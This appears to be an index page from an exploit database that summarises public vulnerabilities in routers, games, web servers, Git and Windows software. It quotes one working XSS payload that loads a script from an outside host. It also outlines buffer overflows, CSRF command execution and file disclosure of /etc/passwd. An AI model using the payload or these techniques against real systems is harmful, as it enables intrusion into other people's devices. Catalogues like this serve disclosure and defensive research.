header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

XSS persistent on intelbras router with firmware WRN 250

This exploit allows for persistent XSS on intelbras routers with firmware WRN 250. The vulnerability can be exploited by injecting a malicious script through the URL http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm. The payload used in the exploit is </script><script src='//elb.me'>. This exploit requires the presence of a PHP script to retrieve the logs.

0day Live for speed patch x s2 /s1 and demo local .Spr File buffer over flow

The exploit takes advantage of a buffer overflow vulnerability in the .spr file format used in Live for Speed. By crafting a specially crafted .spr file, an attacker can overwrite the EIP register and execute arbitrary code. This vulnerability is different from the previously discovered buffer overflow in .mpr files. The .spr files are stored in a separate folder and have a different file structure. The exploit code provided can be compiled using Dev C++ 4.9.9.2. Use caution when handling .spr files as they can be used for malicious purposes.

0day Live for speed patch x s2 /s1 and demo local .ply File buffer over flow

The vulnerability occurs in Live for speed .ply file due to an overly long number plate string. By exploiting this issue, an attacker can execute malicious shell code by convincing a user to put the .ply file inside their misc folder inside of Lfs2. The buffer overflow occurs when filling the number plate field with over 1000 bytes of buffer.

MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION

Remote attackers who can lure a Mongoose web server user into clicking a malicious link or visit attacker controlled web page can execute system commands on the system hosting Mongoose server. However, IF Mongoose web server is installed as service then executing programs e.g. 'calc.exe' may at times crash or fail to appear, but you may see it in Windows taskmgr.exe. Therefore, from my tests commands may become unstable when Mongoose is run as a service. When Mongoose is run standard mode attackers can potentially modify 'Mongoose.conf' and create arbitrary files on server like .PHP etc. to point Mongoose to this as its new 'index' file. Then you need to tell Mongoose its 'access_log_file' is the new attacker generated file, after injecting commands into Mongoose web servers log file that will get executed when log file is later requested. This vulnerability requires CGI interpreter to be already set or some information about the target is known like the CGI path and language 'pl,php,cgi' used, so when we can set to use correct programming language when file is created during initial CRSF attack.

YNP Portal System 2.2.0 Remote File Disclosure Vulnerability

The YNP Portal System version 2.2.0 is vulnerable to remote file disclosure. This allows an attacker to access sensitive files on the server by exploiting the 'showpage.cgi' script. By manipulating the 'p' parameter in the URL, an attacker can disclose files outside the web root directory, such as the '/etc/passwd' file.

Malicious Git HTTP Server For CVE-2017-1000117

This module exploits CVE-2017-1000117, which affects Git version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed parameters from the username incorrectly. This can be used to inject commands to the operating system when the submodule is cloned. This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised.

( Microsoft Visual 6 ) VDT70.DLL Stack Overflow Exploit

This exploit targets the VDT70.DLL component in Microsoft Visual Database Tools Database Designer V7.0. It takes advantage of a stack overflow vulnerability to execute arbitrary code. The exploit was discovered by D_7J and developed by the DeltahackingSecurityTEAM. It has been tested on Windows XP Professional SP2 with Internet Explorer 6.

Easy Vedio to PSP Converter 1.6.20 – Local Buffer Overflow (SEH)

The exploit takes advantage of a buffer overflow vulnerability in Easy Vedio to PSP Converter version 1.6.20. By pasting a specially crafted content into the 'Enter User Name' field, an attacker can trigger the overflow and gain control of the program's execution flow.

Recent Exploits: